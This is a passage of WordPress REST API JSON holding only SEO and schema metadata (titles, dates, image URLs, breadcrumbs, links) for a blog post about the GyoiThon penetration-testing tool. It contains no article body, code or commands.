href=\"https:\/\/sajinshivdas.com\/cybersecurity\/gyoithon-next-generation-penetration-testing-tool-using-machine-learning\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"GyoiThon: Next Generation Penetration Testing Tool Using Machine Learning - Sajin Shivdas | Cybersecurity\" \/>\n<meta property=\"og:description\" content=\"GyoiThon execute&nbsp;remote access&nbsp;to target Web server and&nbsp;identifies product operated on the server&nbsp;such as CMS, Web server software,\" \/>\n<meta property=\"og:url\" content=\"https:\/\/sajinshivdas.com\/cybersecurity\/gyoithon-next-generation-penetration-testing-tool-using-machine-learning\/\" \/>\n<meta property=\"og:site_name\" content=\"Sajin Shivdas | Cybersecurity\" \/>\n<meta property=\"article:published_time\" content=\"2022-10-04T06:40:12+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2024-08-13T10:21:31+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/sajinshivdas.com\/cybersecurity\/wp-content\/uploads\/2022\/10\/shield-icon-cyber-security-digital-data-network-protection-future-technology-digital-data-network-connection.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"1500\" \/>\n\t<meta property=\"og:image:height\" content=\"844\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Sajin Shivdas\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Sajin Shivdas\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"19 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":[\"Article\",\"BlogPosting\"],\"@id\":\"https:\\\/\\\/sajinshivdas.com\\\/cybersecurity\\\/gyoithon-next-generation-penetration-testing-tool-using-machine-learning\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/sajinshivdas.com\\\/cybersecurity\\\/gyoithon-next-generation-penetration-testing-tool-using-machine-learning\\\/\"},\"author\":{\"name\":\"Sajin Shivdas\",\"@id\":\"https:\\\/\\\/sajinshivdas.com\\\/cybersecurity\\\/#\\\/schema\\\/person\\\/af1d121cbedd3ce64369f21a359ff2e6\"},\"headline\":\"GyoiThon: Next Generation Penetration Testing Tool Using Machine Learning\",\"datePublished\":\"2022-10-04T06:40:12+00:00\",\"dateModified\":\"2024-08-13T10:21:31+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/sajinshivdas.com\\\/cybersecurity\\\/gyoithon-next-generation-penetration-testing-tool-using-machine-learning\\\/\"},\"wordCount\":3877,\"publisher\":{\"@id\":\"https:\\\/\\\/sajinshivdas.com\\\/cybersecurity\\\/#\\\/schema\\\/person\\\/af1d121cbedd3ce64369f21a359ff2e6\"},\"image\":{\"@id\":\"https:\\\/\\\/sajinshivdas.com\\\/cybersecurity\\\/gyoithon-next-generation-penetration-testing-tool-using-machine-learning\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/sajinshivdas.com\\\/cybersecurity\\\/wp-content\\\/uploads\\\/2022\\\/10\\\/shield-icon-cyber-security-digital-data-network-protection-future-technology-digital-data-network-connection.jpg\",\"keywords\":[\"Utilities\",\"VAPT\"],\"articleSection\":[\"Utilities\",\"VAPT\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/sajinshivdas.com\\\/cybersecurity\\\/gyoithon-next-generation-penetration-testing-tool-using-machine-learning\\\/\",\"url\":\"https:\\\/\\\/sajinshivdas.com\\\/cybersecurity\\\/gyoithon-next-generation-penetration-testing-tool-using-machine-learning\\\/\",\"name\":\"GyoiThon: Next Generation Penetration Testing Tool Using Machine Learning - Sajin Shivdas | Cybersecurity\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/sajinshivdas.com\\\/cybersecurity\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/sajinshivdas.com\\\/cybersecurity\\\/gyoithon-next-generation-penetration-testing-tool-using-machine-learning\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/sajinshivdas.com\\\/cybersecurity\\\/gyoithon-next-generation-penetration-testing-tool-using-machine-learning\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/sajinshivdas.com\\\/cybersecurity\\\/wp-content\\\/uploads\\\/2022\\\/10\\\/shield-icon-cyber-security-digital-data-network-protection-future-technology-digital-data-network-connection.jpg\",\"datePublished\":\"2022-10-04T06:40:12+00:00\",\"dateModified\":\"2024-08-13T10:21:31+00:00\",\"description\":\"GyoiThon execute&nbsp;remote access&nbsp;to target Web server and&nbsp;identifies product operated on the server&nbsp;such as CMS, Web server software,\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/sajinshivdas.com\\\/cybersecurity\\\/gyoithon-next-generation-penetration-testing-tool-using-machine-learning\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/sajinshivdas.com\\\/cybersecurity\\\/gyoithon-next-generation-penetration-testing-tool-using-machine-learning\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/sajinshivdas.com\\\/cybersecurity\\\/gyoithon-next-generation-penetration-testing-tool-using-machine-learning\\\/#primaryimage\",\"url\":\"https:\\\/\\\/sajinshivdas.com\\\/cybersecurity\\\/wp-content\\\/uploads\\\/2022\\\/10\\\/shield-icon-cyber-security-digital-data-network-protection-future-technology-digital-data-network-connection.jpg\",\"contentUrl\":\"https:\\\/\\\/sajinshivdas.com\\\/cybersecurity\\\/wp-content\\\/uploads\\\/2022\\\/10\\\/shield-icon-cyber-security-digital-data-network-protection-future-technology-digital-data-network-connection.jpg\",\"width\":1500,\"height\":844},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/sajinshivdas.com\\\/cybersecurity\\\/gyoithon-next-generation-penetration-testing-tool-using-machine-learning\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/sajinshivdas.com\\\/cybersecurity\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"GyoiThon: Next Generation Penetration Testing Tool Using Machine Learning\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/sajinshivdas.com\\\/cybersecurity\\\/#website\",\"url\":\"https:\\\/\\\/sajinshivdas.com\\\/cybersecurity\\\/\",\"name\":\"sajinshivdas.com\",\"description\":\"Cybersecurity - Information security Resources, Articles and Latest News\",\"publisher\":{\"@id\":\"https:\\\/\\\/sajinshivdas.com\\\/cybersecurity\\\/#\\\/schema\\\/person\\\/af1d121cbedd3ce64369f21a359ff2e6\"},\"alternateName\":\"Sajin Shivdas\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/sajinshivdas.com\\\/cybersecurity\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":[\"Person\",\"Organization\"],\"@id\":\"https:\\\/\\\/sajinshivdas.com\\\/cybersecurity\\\/#\\\/schema\\\/person\\\/af1d121cbedd3ce64369f21a359ff2e6\",\"name\":\"Sajin Shivdas\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/sajinshivdas.com\\\/cybersecurity\\\/wp-content\\\/uploads\\\/2023\\\/01\\\/5dbd4f42-9550-4c99-82e9-34f3c99a2253.png\",\"url\":\"https:\\\/\\\/sajinshivdas.com\\\/cybersecurity\\\/wp-content\\\/uploads\\\/2023\\\/01\\\/5dbd4f42-9550-4c99-82e9-34f3c99a2253.png\",\"contentUrl\":\"https:\\\/\\\/sajinshivdas.com\\\/cybersecurity\\\/wp-content\\\/uploads\\\/2023\\\/01\\\/5dbd4f42-9550-4c99-82e9-34f3c99a2253.png\",\"width\":1000,\"height\":500,\"caption\":\"Sajin Shivdas\"},\"logo\":{\"@id\":\"https:\\\/\\\/sajinshivdas.com\\\/cybersecurity\\\/wp-content\\\/uploads\\\/2023\\\/01\\\/5dbd4f42-9550-4c99-82e9-34f3c99a2253.png\"},\"sameAs\":[\"http:\\\/\\\/sajinshivdas.com\\\/security\",\"www.linkedin.com\\\/in\\\/sajin-shivdas\"]}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"GyoiThon: Next Generation Penetration Testing Tool Using Machine Learning - Sajin Shivdas | Cybersecurity","description":"GyoiThon execute&nbsp;remote access&nbsp;to target Web server and&nbsp;identifies product operated on the server&nbsp;such as CMS, Web server software,","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/sajinshivdas.com\/cybersecurity\/gyoithon-next-generation-penetration-testing-tool-using-machine-learning\/","og_locale":"en_US","og_type":"article","og_title":"GyoiThon: Next Generation Penetration Testing Tool Using Machine Learning - Sajin Shivdas | Cybersecurity","og_description":"GyoiThon execute&nbsp;remote access&nbsp;to target Web server and&nbsp;identifies product operated on the server&nbsp;such as CMS, Web server software,","og_url":"https:\/\/sajinshivdas.com\/cybersecurity\/gyoithon-next-generation-penetration-testing-tool-using-machine-learning\/","og_site_name":"Sajin Shivdas | Cybersecurity","article_published_time":"2022-10-04T06:40:12+00:00","article_modified_time":"2024-08-13T10:21:31+00:00","og_image":[{"width":1500,"height":844,"url":"https:\/\/sajinshivdas.com\/cybersecurity\/wp-content\/uploads\/2022\/10\/shield-icon-cyber-security-digital-data-network-protection-future-technology-digital-data-network-connection.jpg","type":"image\/jpeg"}],"author":"Sajin Shivdas","twitter_misc":{"Written by":"Sajin Shivdas","Est. reading time":"19 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":["Article","BlogPosting"],"@id":"https:\/\/sajinshivdas.com\/cybersecurity\/gyoithon-next-generation-penetration-testing-tool-using-machine-learning\/#article","isPartOf":{"@id":"https:\/\/sajinshivdas.com\/cybersecurity\/gyoithon-next-generation-penetration-testing-tool-using-machine-learning\/"},"author":{"name":"Sajin Shivdas","@id":"https:\/\/sajinshivdas.com\/cybersecurity\/#\/schema\/person\/af1d121cbedd3ce64369f21a359ff2e6"},"headline":"GyoiThon: Next Generation Penetration Testing Tool Using Machine Learning","datePublished":"2022-10-04T06:40:12+00:00","dateModified":"2024-08-13T10:21:31+00:00","mainEntityOfPage":{"@id":"https:\/\/sajinshivdas.com\/cybersecurity\/gyoithon-next-generation-penetration-testing-tool-using-machine-learning\/"},"wordCount":3877,"publisher":{"@id":"https:\/\/sajinshivdas.com\/cybersecurity\/#\/schema\/person\/af1d121cbedd3ce64369f21a359ff2e6"},"image":{"@id":"https:\/\/sajinshivdas.com\/cybersecurity\/gyoithon-next-generation-penetration-testing-tool-using-machine-learning\/#primaryimage"},"thumbnailUrl":"https:\/\/sajinshivdas.com\/cybersecurity\/wp-content\/uploads\/2022\/10\/shield-icon-cyber-security-digital-data-network-protection-future-technology-digital-data-network-connection.jpg","keywords":["Utilities","VAPT"],"articleSection":["Utilities","VAPT"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/sajinshivdas.com\/cybersecurity\/gyoithon-next-generation-penetration-testing-tool-using-machine-learning\/","url":"https:\/\/sajinshivdas.com\/cybersecurity\/gyoithon-next-generation-penetration-testing-tool-using-machine-learning\/","name":"GyoiThon: Next Generation Penetration Testing Tool Using Machine Learning - Sajin Shivdas | Cybersecurity","isPartOf":{"@id":"https:\/\/sajinshivdas.com\/cybersecurity\/#website"},"primaryImageOfPage":{"@id":"https:\/\/sajinshivdas.com\/cybersecurity\/gyoithon-next-generation-penetration-testing-tool-using-machine-learning\/#primaryimage"},"image":{"@id":"https:\/\/sajinshivdas.com\/cybersecurity\/gyoithon-next-generation-penetration-testing-tool-using-machine-learning\/#primaryimage"},"thumbnailUrl":"https:\/\/sajinshivdas.com\/cybersecurity\/wp-content\/uploads\/2022\/10\/shield-icon-cyber-security-digital-data-network-protection-future-technology-digital-data-network-connection.jpg","datePublished":"2022-10-04T06:40:12+00:00","dateModified":"2024-08-13T10:21:31+00:00","description":"GyoiThon execute&nbsp;remote access&nbsp;to target Web server and&nbsp;identifies product operated on the server&nbsp;such as CMS, Web server software,","breadcrumb":{"@id":"https:\/\/sajinshivdas.com\/cybersecurity\/gyoithon-next-generation-penetration-testing-tool-using-machine-learning\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/sajinshivdas.com\/cybersecurity\/gyoithon-next-generation-penetration-testing-tool-using-machine-learning\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/sajinshivdas.com\/cybersecurity\/gyoithon-next-generation-penetration-testing-tool-using-machine-learning\/#primaryimage","url":"https:\/\/sajinshivdas.com\/cybersecurity\/wp-content\/uploads\/2022\/10\/shield-icon-cyber-security-digital-data-network-protection-future-technology-digital-data-network-connection.jpg","contentUrl":"https:\/\/sajinshivdas.com\/cybersecurity\/wp-content\/uploads\/2022\/10\/shield-icon-cyber-security-digital-data-network-protection-future-technology-digital-data-network-connection.jpg","width":1500,"height":844},{"@type":"BreadcrumbList","@id":"https:\/\/sajinshivdas.com\/cybersecurity\/gyoithon-next-generation-penetration-testing-tool-using-machine-learning\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/sajinshivdas.com\/cybersecurity\/"},{"@type":"ListItem","position":2,"name":"GyoiThon: Next Generation Penetration Testing Tool Using Machine Learning"}]},{"@type":"WebSite","@id":"https:\/\/sajinshivdas.com\/cybersecurity\/#website","url":"https:\/\/sajinshivdas.com\/cybersecurity\/","name":"sajinshivdas.com","description":"Cybersecurity - Information security Resources, Articles and Latest News","publisher":{"@id":"https:\/\/sajinshivdas.com\/cybersecurity\/#\/schema\/person\/af1d121cbedd3ce64369f21a359ff2e6"},"alternateName":"Sajin Shivdas","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/sajinshivdas.com\/cybersecurity\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":["Person","Organization"],"@id":"https:\/\/sajinshivdas.com\/cybersecurity\/#\/schema\/person\/af1d121cbedd3ce64369f21a359ff2e6","name":"Sajin Shivdas","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/sajinshivdas.com\/cybersecurity\/wp-content\/uploads\/2023\/01\/5dbd4f42-9550-4c99-82e9-34f3c99a2253.png","url":"https:\/\/sajinshivdas.com\/cybersecurity\/wp-content\/uploads\/2023\/01\/5dbd4f42-9550-4c99-82e9-34f3c99a2253.png","contentUrl":"https:\/\/sajinshivdas.com\/cybersecurity\/wp-content\/uploads\/2023\/01\/5dbd4f42-9550-4c99-82e9-34f3c99a2253.png","width":1000,"height":500,"caption":"Sajin Shivdas"},"logo":{"@id":"https:\/\/sajinshivdas.com\/cybersecurity\/wp-content\/uploads\/2023\/01\/5dbd4f42-9550-4c99-82e9-34f3c99a2253.png"},"sameAs":["http:\/\/sajinshivdas.com\/security","www.linkedin.com\/in\/sajin-shivdas"]}]}},"_links":{"self":[{"href":"https:\/\/sajinshivdas.com\/cybersecurity\/wp-json\/wp\/v2\/posts\/248","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/sajinshivdas.com\/cybersecurity\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/sajinshivdas.com\/cybersecurity\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/sajinshivdas.com\/cybersecurity\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/sajinshivdas.com\/cybersecurity\/wp-json\/wp\/v2\/comments?post=248"}],"version-history":[{"count":0,"href":"https:\/\/sajinshivdas.com\/cybersecurity\/wp-json\/wp\/v2\/posts\/248\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/sajinshivdas.com\/cybersecurity\/wp-json\/wp\/v2\/media\/6358"}],"wp:attachment":[{"href":"https:\/\/sajinshivdas.com\/cybersecurity\/wp-json\/wp\/v2\/media?parent=248"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/sajinshivdas.com\/cybersecurity\/wp-json\/wp\/v2\/categories?post=248"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/sajinshivdas.com\/cybersecurity\/wp-json\/wp\/v2\/tags?post=248"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}